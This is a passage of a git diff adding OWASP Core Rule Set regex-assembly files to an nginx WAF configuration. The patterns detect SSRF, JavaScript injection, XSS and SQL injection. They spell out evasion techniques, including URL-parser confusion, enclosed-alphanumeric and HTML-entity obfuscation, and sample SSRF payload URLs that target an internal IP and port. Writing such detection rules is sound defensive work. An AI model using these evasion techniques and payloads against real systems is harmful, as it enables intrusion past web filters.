http://google.com:80+&@127.88.23.245:22/#+@google.com:80/ + ##! http://google.com:80+&@google.com:80#+@127.88.23.245:22/ + + ##! create ip-or-domain for later use + ##!> assemble + (?:\d{1,3}\.){3,3}\d{1,3} + [a-z][\w\-\.]{1,255} + ##!=> + :\d{1,5} + ##!=< ip-or-domain + ##!< + + ##!> assemble + ##! domain + port + [a-z][\w\-\.]{1,255}:\d{1,5} + ##!=> + + ##! at least one of the evasion techniques + ##!> assemble + ##! technique 1 + ##!> assemble + ##! possible white spaces to fool safety checks in URL parsers + \s* + ##!=> + + ##! &@ to confuse URL parsers (& can indicate query parameter, @ indicates user info) + &?@ + ##!=> + + ##! IPv4 + port or domain + port + ##!=> ip-or-domain + + ##! optional forward slash + \/? + ##!=> + ##!< + + ##! technique 2 + ##!> assemble + ##! fragment to confuse URL parsers + # + ##!=> + + ##! possible white spaces to fool safety checks in URL parsers + \s* + ##!=> + + ##! &@ to confuse URL parsers (& can indicate query parameter, @ indicates user info) + &?@ + ##!=> + + ##! IPv4 + port or domain + port + ##!=> ip-or-domain + + ##! optional forward slash + /? + ##!=> + ##!< + ##!< + ##!=> + + + ##!=> + ##!< + + ##! Enclosed alphanumerics are used for evasion (https://en.wikipedia.org/wiki/Enclosed_Alphanumerics). + ##! See also https://github.com/cujanovic/SSRF-Testing. + ##! These will normally sound many alarms, but having them flagged as ssrf attempt makes sense + + ##!> assemble + ##! ⓪,①,②,③,④,⑤,⑥,⑦,⑧,⑨,⑩,⑪,⑫,⑬,⑭,⑮,⑯,⑰,⑱,⑲,⑳ + \xe2\x91[\xaa\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3] + ##! ⑴,⑵,⑶,⑷,⑸,⑹,⑺,⑻,⑼,⑽,⑾,⑿ + \xe2\x91[\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf] + ##! ⒀,⒁,⒂,⒃,⒄,⒅,⒆,⒇ + \xe2\x92[\x80\x81\x82\x83\x84\x85\x86\x87] + ##! ⒈,⒉,⒊,⒋,⒌,⒍,⒎,⒏,⒐,⒑,⒒,⒓,⒔,⒕,⒖,⒗,⒘,⒙,⒚,⒛ + \xe2\x92[\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b] + ##! ⒜,⒝,⒞,⒟,⒠,⒡,⒢,⒣,⒤,⒥,⒦,⒧,⒨,⒩,⒪,⒫,⒬,⒭,⒮,⒯,⒰,⒱,⒲,⒳,⒴,⒵ + \xe2\x92[\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5] + ##! Ⓐ,Ⓑ,Ⓒ,Ⓓ,Ⓔ,Ⓕ,Ⓖ,Ⓗ,Ⓘ,Ⓙ + \xe2\x92[\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf] + ##! Ⓚ,Ⓛ,Ⓜ,Ⓝ,Ⓞ,Ⓟ,Ⓠ,Ⓡ,Ⓢ,Ⓣ,Ⓤ,Ⓥ,Ⓦ,Ⓧ,Ⓨ,Ⓩ + \xe2\x93[\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f] + ##! ⓐ,ⓑ,ⓒ,ⓓ,ⓔ,ⓕ,ⓖ,ⓗ,ⓘ,ⓙ,ⓚ,ⓛ + \xe2\x93[\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b] + ##! ⓜ,ⓝ,ⓞ,ⓟ,ⓠ,ⓡ,ⓢ,ⓣ,ⓤ,ⓥ,ⓦ,ⓧ,ⓨ,ⓩ + \xe2\x93[\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9] + ##! ⓫,⓬,⓭,⓮,⓯,⓰,⓱,⓲,⓳,⓴ + \xe2\x93[\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4] + ##! ⓿,⓵,⓶,⓷,⓸,⓹,⓺,⓻,⓼,⓽,⓾ + \xe2\x93[\xbf\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe] + ##! ideographic full stop: 。 + \xe3\x80\x82 + ##!=< enclosed-alnums + ##!< + + ##! an IP could start with digits and dots + ##!> assemble + [\d.]{0,11} + ##!=> + ##!> assemble + ##!=> enclosed-alnums + ##!< + ##!=> + ##! match all for capture + + + ##!=> + ##!< +##!< diff --git a/nginx/config/owasp-crs/regex-assembly/934140.ra b/nginx/config/owasp-crs/regex-assembly/934140.ra new file mode 100644 index 00000000..ec33ac56 --- /dev/null +++ b/nginx/config/owasp-crs/regex-assembly/934140.ra @@ -0,0 +1,4 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +\@\{.*\} diff --git a/nginx/config/owasp-crs/regex-assembly/934150.ra b/nginx/config/owasp-crs/regex-assembly/934150.ra new file mode 100644 index 00000000..22786be6 --- /dev/null +++ b/nginx/config/owasp-crs/regex-assembly/934150.ra @@ -0,0 +1,4 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +Process\s*\.\s*spawn\s*\( diff --git a/nginx/config/owasp-crs/regex-assembly/934160.ra b/nginx/config/owasp-crs/regex-assembly/934160.ra new file mode 100644 index 00000000..f62d06d9 --- /dev/null +++ b/nginx/config/owasp-crs/regex-assembly/934160.ra @@ -0,0 +1,9 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##! Match while(true) like loops +##!> assemble +##!^ while\s*\([\s(]* +##!$ .*\) + ##!> include js-truthy-values +##!< diff --git a/nginx/config/owasp-crs/regex-assembly/934170.ra b/nginx/config/owasp-crs/regex-assembly/934170.ra new file mode 100644 index 00000000..8ea60176 --- /dev/null +++ b/nginx/config/owasp-crs/regex-assembly/934170.ra @@ -0,0 +1,10 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##!^ ^ + +##!> assemble + data: + ##!=> + ##!> include charset-specification-no-anchors +##!< diff --git a/nginx/config/owasp-crs/regex-assembly/941130.ra b/nginx/config/owasp-crs/regex-assembly/941130.ra new file mode 100644 index 00000000..422c34e6 --- /dev/null +++ b/nginx/config/owasp-crs/regex-assembly/941130.ra @@ -0,0 +1,17 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##!+ i +##!^ . +##!$ \b + +\bxlink:href +\bxhtml +\bxmlns +!ENTITY\s+(?:\S+|%\s+\S+)\s+SYSTEM +!ENTITY\s+(?:\S+|%\s+\S+)\s+PUBLIC +\bdata:text/html +\bformaction +@import +;base64 +\bpattern\b.*?= diff --git a/nginx/config/owasp-crs/regex-assembly/941160.ra b/nginx/config/owasp-crs/regex-assembly/941160.ra new file mode 100644 index 00000000..bccb2a92 --- /dev/null +++ b/nginx/config/owasp-crs/regex-assembly/941160.ra @@ -0,0 +1,370 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##!+ i + +##!> assemble + <[^\w<>]*(?:[^<>\"'\s]*:)?[^\w<>]*\W*? + ##!=< js-prop-prefix +##!< + +##!> assemble + s\W*?c\W*?r\W*?i\W*?p\W*?t + f\W*?o\W*?r\W*?m + s\W*?t\W*?y\W*?l\W*?e + s\W*?v\W*?g + m\W*?a\W*?r\W*?q\W*?u\W*?e\W*?e + l\W*?i\W*?n\W*?k[^>\w] + o\W*?b\W*?j\W*?e\W*?c\W*?t[^>\w] + e\W*?m\W*?b\W*?e\W*?d[^>\w] + a\W*?p\W*?p\W*?l\W*?e\W*?t[^>\w] + p\W*?a\W*?r\W*?a\W*?m[^>\w] + i?\W*?f\W*?r\W*?a\W*?m\W*?e[^>\w] + b\W*?a\W*?s\W*?e[^>\w] + b\W*?o\W*?d\W*?y[^>\w] + m\W*?e\W*?t\W*?a[^>\w] + i\W*?m\W*?a?\W*?g\W*?e?[^>\w] + v\W*?i\W*?d\W*?e\W*?o[^>\w] + a\W*?u\W*?d\W*?i\W*?o[^>\w] + b\W*?i\W*?n\W*?d\W*?i\W*?n\W*?g\W*?s[^>\w] + s\W*?e\W*?t[^>\w] + a\W*?n\W*?i\W*?m\W*?a\W*?t\W*?e[^>\w] + ##!=< js-payloads +##!< + + +##!> assemble + (?:<\w.*[\s/]|['\"](?:.*[\s/])?) + ##!=< html-properties-prefix +##!< + +##!> assemble + background + formaction + lowsrc + onabort + onactivate + onadapteradded + onaddtrack + onafterprint + onafterscriptexecute + onafterupdate + onalerting + onanimationcancel + onanimationend + onanimationiteration + onanimationstart + onantennastatechange + onappcommand + onaudioend + onaudioprocess + onaudiostart + onauxclick + onbeforeactivate + onbeforecopy + onbeforecut + onbeforedeactivate + onbeforeeditfocus + onbeforeinput + onbeforepaste + onbeforeprint + onbeforescriptexecute + onbeforetoggle + onbeforeunload + onbeforeupdate + onbegin + onbeginEvent + onblocked + onblur + onbounce + onboundary + onbroadcast + onbusy + oncached + oncallschanged + oncanplay + oncanplaythrough + oncardstatechange + oncellchange + oncfstatechange + onchange + onchargingchange + onchargingtimechange + onchecking + onclick + onclose + oncommand + oncommandupdate + oncomplete + oncompositionend + oncompositionstart + oncompositionupdate + onconnected + onconnecting + oncontextmenu + oncontrolselect + oncopy + oncuechange + oncut + ondataavailable + ondatachange + ondataerror + ondatasetchanged + ondatasetcomplete + ondblclick + ondeactivate + ondeliveryerror + ondeliverysuccess + ondevicefound + ondevicelight + ondevicemotion + ondeviceorientation + ondeviceproximity + ondialing + ondisabled + ondischargingtimechange + ondisconnected + ondisconnecting + ondomactivate + ondomattrmodified + ondomcharacterdatamodified + ondomfocusin + ondomfocusout + ondommousescroll + ondomnodeinserted + ondomnodeinsertedintodocument + ondomnoderemoved + ondomnoderemovedfromdocument + ondomsubtreemodified + ondownloading + ondragdrop + ondragend + ondragenter + ondragexit + ondraggesture + ondragleave + ondragover + ondragstart + ondrop + ondurationchange + onemptied + onenabled + onend + onended + onendEvent + onenter + onerror + onerrorupdate + onexit + onfailed + onfilterchange + onfinish + onfocus + onfocusin + onfocusout + onformchange + onforminput + onfullscreenchange + ongamepadaxismove + ongamepadbuttondown + ongamepadbuttonup + ongamepadconnected + ongamepaddisconnected + onget + onhashchange + onheadphoneschange + onheld + onhelp + onholding + onicccardlockerror + oniccinfochange + onincoming + oninput + oninvalid + onkeydown + onkeypress + onkeyup + onlevelchange + onload + onloadeddata + onloadedmetadata + onloadend + onloadstart + onlosecapture + only + onmark + onmessage + onmousedown + onmouseenter + onmouseleave + onmousemove + onmouseout + onmouseover + onmouseup + onmousewheel + onmove + onmoveend + onmovestart + onmozafterpaint + onmozaudioavailable + onmozbeforeresize + onmozedgeuicanceled + onmozedgeuicompleted + onmozedgeuistarted + onmozfullscreenchange + onmozfullscreenerror + onmozmagnifygesture + onmozmagnifygesturestart + onmozmagnifygestureupdate + onmozmousehittest + onmozmousepixelscroll + onmoznetworkdownload + onmoznetworkupload + onmozorientationchange + onmozpointerlockchange + onmozpointerlockerror + onmozpresstapgesture + onmozrotategesture + onmozrotategesturestart + onmozrotategestureupdate + onmozscrolledareachanged + onmozswipegesture + onmozswipegestureend + onmozswipegesturestart + onmozswipegestureupdate + onmoztapgesture + onmoztimechange + onnomatch + onnoupdate + onobsolete + onoffline + ononline + onopen + onoverflow + onoverflowchanged + onpagehide + onpageshow + onpaint + onpaste + onpause + onplay + onplaying + onpointerdown + onpointerenter + onpointerleave + onpointermove + onpointerout + onpointerover + onpointerrawupdate + onpointerup + onpopstate + onpopuphidden + onpopuphiding + onpopupshowing + onpopupshown + onprogress + onpropertychange + onratechange + onreadystatechange + onreceived + onremovetrack + onrepeat + onrepeatEvent + onrequest + onreset + onresize + onresult + onresume + onresuming + onretrieving + onrowenter + onrowexit + onrowsdelete + onrowsinserted + onscroll + onscrollend + onsearch + onseekcomplete + onseeked + onseeking + onselect + onselectionchange + onselectstart + onsending + onsent + onset + onshow + onsoundend + onsoundstart + onspeechend + onspeechstart + onstalled + onstart + onstatechange + onstatuschanged + onstkcommand + onstksessionend + onstop + onsubmit + onsuccess + onsuspend + onsvgabort + onsvgerror + onsvgload + onsvgresize + onsvgscroll + onsvgunload + onsvgzoom + ontext + ontimeout + ontimeupdate + ontoggle + ontouchcancel + ontouchend + ontouchenter + ontouchleave + ontouchmove + ontouchstart + ontransitioncancel + ontransitionend + ontransitionrun + ontransitionstart + onunderflow + onunhandledrejection + onunload + onupdateready + onupgradeneeded + onuserproximity + onussdreceived + onversionchange + onvoicechange + onvolumechange + onwaiting + onwarning + onwebkitanimationend + onwebkitanimationiteration + onwebkitanimationstart + onwebkittransitionend + onwheel + onzoom + ping + src + style + ##!=< html-properties +##!< + +##!> assemble + [\s\x08]*?= + ##!=< html-properties-end +##!< + +##!> assemble + ##!=> js-prop-prefix + ##!=> js-payloads +##!< + +##!> assemble + ##!=> html-properties-prefix + ##!=> html-properties + ##!=> html-properties-end +##!< diff --git a/nginx/config/owasp-crs/regex-assembly/941210.ra b/nginx/config/owasp-crs/regex-assembly/941210.ra new file mode 100644 index 00000000..45f15516 --- /dev/null +++ b/nginx/config/owasp-crs/regex-assembly/941210.ra @@ -0,0 +1,231 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##! This rule tries to match all the possible ways to write 'javascript' using +##! html entities, and javascript escape sequences. +##! See https://html.spec.whatwg.org/multipage/named-characters.html#named-character-references for examples. +##! And https://www.w3schools.com/charsets/ref_html_ascii.asp for the list of +##! all the possible html entities. + +##!+ i + +##! Matched order is sequential: we first match 'j', then 'a', then 'v', etc. + +##!> define html_entity_hex_prefix �* +##!> define html_entity_dec_prefix �* +##!> define whitespaces [\t\n\r] + +##! html_encoded_whitespace is a list of all the possible ways to write an encoded whitespace +##!> assemble + ##! canonical form + {{whitespaces}} + ##! alternative forms + ##!> assemble + ##! 09 horizontal tab + ##! 10 line feed + ##! 13 carriage return + ##! 0A line feed (hex) + ##! 0D carriage return (hex) + {{html_entity_dec_prefix}}9;? + {{html_entity_dec_prefix}}10;? + {{html_entity_dec_prefix}}13;? + {{html_entity_hex_prefix}}A;? + {{html_entity_hex_prefix}}D;? + &tab; + &newline; + ##!=> + ##!< + ##!=> + * + ##!=< html_encoded_whitespace +##!< + +##! all the possible ways to end the word 'javascript', plus whitespaces +##!> assemble + ##! canonical form + : + ##! alternative forms + ##!> assemble + ##! 58 : colon + ##! 3A : colon (hex) + {{html_entity_dec_prefix}}58;? + {{html_entity_hex_prefix}}3A;? + : + ##!< + ##!=> + . + ##!=< end_javascript +##!< + +##! all the possible ways to write 'j', plus whitespaces +##! canonical form +j +##! alternative forms +##!> assemble + ##! J 74 uppercase J + ##! j 106 lowercase j + ##! J 4A uppercase J (hex) + ##! j 6A lowercase j (hex) + {{html_entity_dec_prefix}}74; + {{html_entity_dec_prefix}}106; + {{html_entity_hex_prefix}}4A; + {{html_entity_hex_prefix}}6A; +##!< +##!=> +##!=> html_encoded_whitespace + +##! all the possible ways to write 'a', plus whitespaces +##!> assemble + ##! canonical form + a + ##! alternative forms + ##!> assemble + ##! A 65 uppercase A + ##! a 97 lowercase a + ##! A 41 uppercase A (hex) + ##! a 61 lowercase a (hex) + {{html_entity_dec_prefix}}65; + {{html_entity_dec_prefix}}97; + {{html_entity_hex_prefix}}41; + {{html_entity_hex_prefix}}61; + ##!< + ##!=> + ##!=> html_encoded_whitespace + ##!=< all_possible_ways_to_write_a +##!< + +##!=> all_possible_ways_to_write_a + +##! all the possible ways to write 'v', plus whitespaces +##! canonical form +v +##! alternative forms +##!> assemble + ##! V 86 uppercase V + ##! V 56 uppercase V (hex) + ##! v 118 lowercase v + ##! v 76 lowercase v (hex) + {{html_entity_dec_prefix}}86; + {{html_entity_hex_prefix}}56; + {{html_entity_dec_prefix}}118; + {{html_entity_hex_prefix}}76; +##!< +##!=> +##!=> html_encoded_whitespace + +##!=> all_possible_ways_to_write_a + +##! all the possible ways to write 's', plus whitespaces +##! canonical form +s +##! alternative forms +##!> assemble + ##! s 115 lowercase s + ##! s 73 lowercase s (hex) + ##! S 83 uppercase S + ##! S 53 uppercase S (hex) + {{html_entity_dec_prefix}}115; + {{html_entity_hex_prefix}}73; + {{html_entity_dec_prefix}}83; + {{html_entity_hex_prefix}}53; +##!< +##!=> +##!=> html_encoded_whitespace + +##!=> + +##! all the possible ways to write 'c', plus whitespaces +##! canonical form +c +##! alternative forms +##!> assemble + ##! c 67 lowercase C (hex) + ##! c 99 lowercase c + ##! C 43 uppercase c (hex) + ##! C 67 uppercase C + {{html_entity_hex_prefix}}63; + {{html_entity_dec_prefix}}99; + {{html_entity_hex_prefix}}43; + {{html_entity_dec_prefix}}67; +##!< +##!=> +##!=> html_encoded_whitespace + +##!=> + +##! all the possible ways to write 'r', plus whitespaces +##! canonical form +r +##! alternative forms +##!> assemble + ##! r 72 lowercase R (hex) + ##! r 114 lowercase r + ##! r 52 uppercase r (hex) + ##! R 82 uppercase R + {{html_entity_hex_prefix}}72; + {{html_entity_dec_prefix}}114; + {{html_entity_hex_prefix}}52; + {{html_entity_dec_prefix}}82; +##!< +##!=> +##!=> html_encoded_whitespace + +##!=> + +##! all the possible ways to write 'i', plus whitespaces +##! canonical form +i +##! alternative forms +##!> assemble + ##! i 69 lowercase i (hex) + ##! i 105 lowercase i + ##! I 49 uppercase i (hex) + ##! I 73 uppercase I + {{html_entity_hex_prefix}}69; + {{html_entity_dec_prefix}}105; + {{html_entity_hex_prefix}}49; + {{html_entity_dec_prefix}}73; +##!< +##!=> +##!=> html_encoded_whitespace + +##!=> + +##! all the possible ways to write 'p', plus whitespaces +##! canonical form +p +##! alternative forms +##!> assemble + ##! p 70 lowercase p (hex) + ##! p 112 lowercase p + ##! P 50 uppercase p (hex) + ##! P 80 uppercase P + {{html_entity_hex_prefix}}70; + {{html_entity_dec_prefix}}112; + {{html_entity_hex_prefix}}50; + {{html_entity_dec_prefix}}80; +##!< +##!=> +##!=> html_encoded_whitespace + +##!=> + +##! all the possible ways to write 't', plus whitespaces +##! canonical form +t +##! alternative forms +##!> assemble + ##! t 74 lowercase t (hex) + ##! t 116 lowercase t + ##! T 54 uppercase t (hex) + ##! T 84 uppercase T + {{html_entity_hex_prefix}}74; + {{html_entity_dec_prefix}}116; + {{html_entity_hex_prefix}}54; + {{html_entity_dec_prefix}}84; +##!< +##!=> +##!=> html_encoded_whitespace +##!=> + +##!=> end_javascript diff --git a/nginx/config/owasp-crs/regex-assembly/941220.ra b/nginx/config/owasp-crs/regex-assembly/941220.ra new file mode 100644 index 00000000..1ecfe9e5 --- /dev/null +++ b/nginx/config/owasp-crs/regex-assembly/941220.ra @@ -0,0 +1,212 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##! This rule tries to match all the possible ways to write 'vbscript' using +##! html entities, and javascript escape sequences. +##! See https://html.spec.whatwg.org/multipage/named-characters.html#named-character-references for examples. +##! And https://www.w3schools.com/charsets/ref_html_ascii.asp for the list of +##! all the possible html entities. + +##!+ i + +##! Matched order is sequential: we first match 'v', then 'b', then 's', etc. + +##!> define html_entity_hex_prefix �* +##!> define html_entity_dec_prefix �* +##!> define whitespaces [\t\n\r] + +##! html_encoded_whitespace is a list of all the possible ways to write an encoded whitespace +##!> assemble + ##! canonical form + {{whitespaces}} + ##! alternative forms + ##!> assemble + ##! 09 horizontal tab + ##! 10 line feed + ##! 13 carriage return + ##! 0A line feed (hex) + ##! 0D carriage return (hex) + {{html_entity_dec_prefix}}9;? + {{html_entity_dec_prefix}}10;? + {{html_entity_dec_prefix}}13;? + {{html_entity_hex_prefix}}A;? + {{html_entity_hex_prefix}}D;? + &tab; + &newline; + ##!=> + ##!< + ##!=> + * + ##!=< html_encoded_whitespace +##!< + +##! all the possible ways to end the word 'vbscript', plus whitespaces +##!> assemble + ##! canonical form + : + ##! alternative forms + ##!> assemble + ##! 58 : colon + ##! 3A : colon (hex) + {{html_entity_dec_prefix}}58;? + {{html_entity_hex_prefix}}3A;? + : + ##!< + ##!=> + . + ##!=< end_vbscript +##!< + +##!=> +##! all the possible ways to write 'v', plus whitespaces +##! canonical form +v +##! alternative forms +##!> assemble + ##! v 86 lowercase v + ##! v 56 lowercase v (hex) + ##! V 83 uppercase V + ##! V 53 uppercase V (hex) + {{html_entity_dec_prefix}}86; + {{html_entity_hex_prefix}}56; + {{html_entity_dec_prefix}}83; + {{html_entity_hex_prefix}}53; +##!< +##!=> +##!=> html_encoded_whitespace + +##!=> + +##! all the possible ways to write 'b', plus whitespaces +##! canonical form +b +##! alternative forms +##!> assemble + ##! b 62 lowercase b + ##! b 98 lowercase b (hex) + ##! B 66 uppercase B + ##! B 42 uppercase B (hex) + {{html_entity_dec_prefix}}62; + {{html_entity_hex_prefix}}98; + {{html_entity_dec_prefix}}66; + {{html_entity_hex_prefix}}42; +##!< +##!=> +##!=> html_encoded_whitespace + +##!=> + +##! all the possible ways to write 's', plus whitespaces +##! canonical form +s +##! alternative forms +##!> assemble + ##! s 115 lowercase s + ##! s 73 lowercase s (hex) + ##! S 83 uppercase S + ##! S 53 uppercase S (hex) + {{html_entity_dec_prefix}}115; + {{html_entity_hex_prefix}}73; + {{html_entity_dec_prefix}}83; + {{html_entity_hex_prefix}}53; +##!< +##!=> +##!=> html_encoded_whitespace + +##!=> + +##! all the possible ways to write 'c', plus whitespaces +##! canonical form +c +##! alternative forms +##!> assemble + ##! c 67 lowercase C (hex) + ##! c 99 lowercase c + ##! C 43 uppercase c (hex) + ##! C 67 uppercase C + {{html_entity_hex_prefix}}63; + {{html_entity_dec_prefix}}99; + {{html_entity_hex_prefix}}43; + {{html_entity_dec_prefix}}67; +##!< +##!=> +##!=> html_encoded_whitespace + +##!=> + +##! all the possible ways to write 'r', plus whitespaces +##! canonical form +r +##! alternative forms +##!> assemble + ##! r 72 lowercase R (hex) + ##! r 114 lowercase r + ##! r 52 uppercase r (hex) + ##! R 82 uppercase R + {{html_entity_hex_prefix}}72; + {{html_entity_dec_prefix}}114; + {{html_entity_hex_prefix}}52; + {{html_entity_dec_prefix}}82; +##!< +##!=> +##!=> html_encoded_whitespace + +##!=> + +##! all the possible ways to write 'i', plus whitespaces +##! canonical form +i +##! alternative forms +##!> assemble + ##! i 69 lowercase i (hex) + ##! i 105 lowercase i + ##! I 49 uppercase i (hex) + ##! I 73 uppercase I + {{html_entity_hex_prefix}}69; + {{html_entity_dec_prefix}}105; + {{html_entity_hex_prefix}}49; + {{html_entity_dec_prefix}}73; +##!< +##!=> +##!=> html_encoded_whitespace + +##!=> + +##! all the possible ways to write 'p', plus whitespaces +##! canonical form +p +##! alternative forms +##!> assemble + ##! p 70 lowercase p (hex) + ##! p 112 lowercase p + ##! P 50 uppercase p (hex) + ##! P 80 uppercase P + {{html_entity_hex_prefix}}70; + {{html_entity_dec_prefix}}112; + {{html_entity_hex_prefix}}50; + {{html_entity_dec_prefix}}80; +##!< +##!=> +##!=> html_encoded_whitespace + +##!=> + +##! all the possible ways to write 't', plus whitespaces +##! canonical form +t +##! alternative forms +##!> assemble + ##! t 74 lowercase t (hex) + ##! t 116 lowercase t + ##! T 54 uppercase t (hex) + ##! T 84 uppercase T + {{html_entity_hex_prefix}}74; + {{html_entity_dec_prefix}}116; + {{html_entity_hex_prefix}}54; + {{html_entity_dec_prefix}}84; +##!< +##!=> +##!=> html_encoded_whitespace +##!=> + +##!=> end_vbscript diff --git a/nginx/config/owasp-crs/regex-assembly/941390.ra b/nginx/config/owasp-crs/regex-assembly/941390.ra new file mode 100644 index 00000000..92288915 --- /dev/null +++ b/nginx/config/owasp-crs/regex-assembly/941390.ra @@ -0,0 +1,16 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##!+ i +##!^ \b +##!$ \s*\( + +eval +settimeout +setinterval +new\s+Function +alert +atob +btoa +prompt +confirm diff --git a/nginx/config/owasp-crs/regex-assembly/942120.ra b/nginx/config/owasp-crs/regex-assembly/942120.ra new file mode 100644 index 00000000..f12014ed --- /dev/null +++ b/nginx/config/owasp-crs/regex-assembly/942120.ra @@ -0,0 +1,37 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##!+ i + +\!\= +\&\& +\|\| +>> +<< +>= +<= +<> +<=> +\bxor\b +\bregexp\b +regexp\s+binary +\bisnull\b +\brlike\b +rlike\s+binary +not\s+between\s+0\s+and +not\s+between\s+(?:(?:'[^']*')|(?:\"[^\"]*\"))\s+and\s+(?:(?:'[^']*')|(?:\"[^\"]*\")) +is\s+null +like\s+null +^in[+\s]*\([\s\d\"]+[^()]*\) +\Win[+\s]*\([\s\d\"]+[^()]*\) +<>\s+binary +\bcollate\W*?(?:U&)?[\"'`] +\bcollate\W+(?:binary|nocase|rtrim)\b +\bcollate\W+\w*?_ +\bnotnull\b +like\s+[\w]+\s+escape\b +\bilike\b +[<>=!]{1,2}\s*all\b +\blikelihood\s*\( +\bunlikely\s*\( +\blikely\s*\( diff --git a/nginx/config/owasp-crs/regex-assembly/942130.ra b/nginx/config/owasp-crs/regex-assembly/942130.ra new file mode 100644 index 00000000..66beb373 --- /dev/null +++ b/nginx/config/owasp-crs/regex-assembly/942130.ra @@ -0,0 +1,42 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##!+ i + +##! General comments: +##! +##! The idea behind this expressions is to capture simple logic based (un)equalities that +##! are used to quickly test SQL Logic that always returns TRUE (hence the term "SQL Tautology"). + +##! We also want to capture the left and right side, and compare for equality. +##! That's why you see below that some of the patterns include grouping explicitly + +##! Prefix: captures the initial part that will be matched on the right hand side of the logical construct. + +##!^ [\s'\"`()]*?\b([\d\w]+)\b[\s'\"`()]*? + +##! These expressions try to match the logic using the operator, +##! so when the operator targets a TRUE operation, the initial match +##! should be present after the operator, logically meaning TRUE +##! +##! Examples: +##! '1' = '1' +##! 'f' like 'f' + +##! This one will also match the "equal" part of '<=' and '>=' +=[\s'\"`()]*?\b([\d\w]+)\b + +##! <=> NULL-safe equal to operator in MySQL +<=>[\s'\"`()]*?\b([\d\w]+)\b + +##! Like queries allow you to use wilcards: '%' + +like[\s'\"`()]*?\b([\d\w]+)\b +sounds\s+like[\s'\"`()]*?\b([\d\w]+)\b + +##! GLOB operator is used to match text values against a pattern +glob[\s'\"`()]*?\b([\d\w]+)\b + +##! String based regexp. These don't use % as wildcard. +rlike[\s'\"`()]*?\b([\d\w]+)\b +regexp[\s'\"`()]*?\b([\d\w]+)\b diff --git a/nginx/config/owasp-crs/regex-assembly/942131.ra b/nginx/config/owasp-crs/regex-assembly/942131.ra new file mode 100644 index 00000000..d4ebdfd9 --- /dev/null +++ b/nginx/config/owasp-crs/regex-assembly/942131.ra @@ -0,0 +1,42 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + + +##! General comments: +##! +##! The idea behind this expressions is to capture simple logic based (un)equalities that +##! are used to quickly test SQL Logic that always returns FALSE. + +##! Prefix: captures the initial part that will be unmatched on the right hand side of the logical construct. + +##!^ [\s'\"`()]*?\b([\d\w]+)\b[\s'\"`()]*? + +##!+ i + +##! These expressions try to match the logic using the negative operator, +##! so when the operator targets a false operation, the initial match +##! should *not* be present after the operator, effectively meaning TRUE. +##! +##! Examples: +##! '1' <= '2' +##! 'a' not like 'b' +##! +##! SQL Comparison Operators: !=, <=, >=, <>, <, >, !>, !<, ^ + +\!=[\s'\"`()]*?\b([\d\w]+)\b +<>[\s'\"`()]*?\b([\d\w]+)\b +<[\s'\"`()]*?\b([\d\w]+)\b +\!<[\s'\"`()]*?\b([\d\w]+)\b +>[\s'\"`()]*?\b([\d\w]+)\b +\!>[\s'\"`()]*?\b([\d\w]+)\b +<=[\s'\"`()]*?\b([\d\w]+)\b +>=[\s'\"`()]*?\b([\d\w]+)\b +\^[\s'\"`()]*?\b([\d\w]+)\b + +is\s+not[\s'\"`()]*?\b([\d\w]+)\b +not\s+like[\s'\"`()]*?\b([\d\w]+)\b + +##! String based regexp. + +not\s+rlike[\s'\"`()]*?\b([\d\w]+)\b +not\s+regexp[\s'\"`()]*?\b([\d\w]+)\b diff --git a/nginx/config/owasp-crs/regex-assembly/942140.ra b/nginx/config/owasp-crs/regex-assembly/942140.ra new file mode 100644 index 00000000..cd2551af --- /dev/null +++ b/nginx/config/owasp-crs/regex-assembly/942140.ra @@ -0,0 +1,31 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##!+ i +##!^ \b + +database\W*\( +db_name\W*\( +information_schema\b +master\.\.sysdatabases\b +msdb\b +msysaccessobjects\b +msysaccessstorage\b +msysaccessxml\b +msysaces\b +msysmodules2\b +msysmodules\b +msysobjects\b +msysqueries\b +msysrelationships\b +mysql\.db\b +northwind\b +pg_catalog\b +pg_toast\b +schema_name\b +schema\W*\( +sqlite_master\b +sqlite_temp_master\b +sysaux\b +sys\.database_name\b +tempdb\b diff --git a/nginx/config/owasp-crs/regex-assembly/942150.ra b/nginx/config/owasp-crs/regex-assembly/942150.ra new file mode 100644 index 00000000..aaaf7ce8 --- /dev/null +++ b/nginx/config/owasp-crs/regex-assembly/942150.ra @@ -0,0 +1,146 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##!+ i +##!^ \b +##!$ \W*\( + +##! SQLite specific functions +json +json_[\w]+ +##! Extracted from docs with: +##! 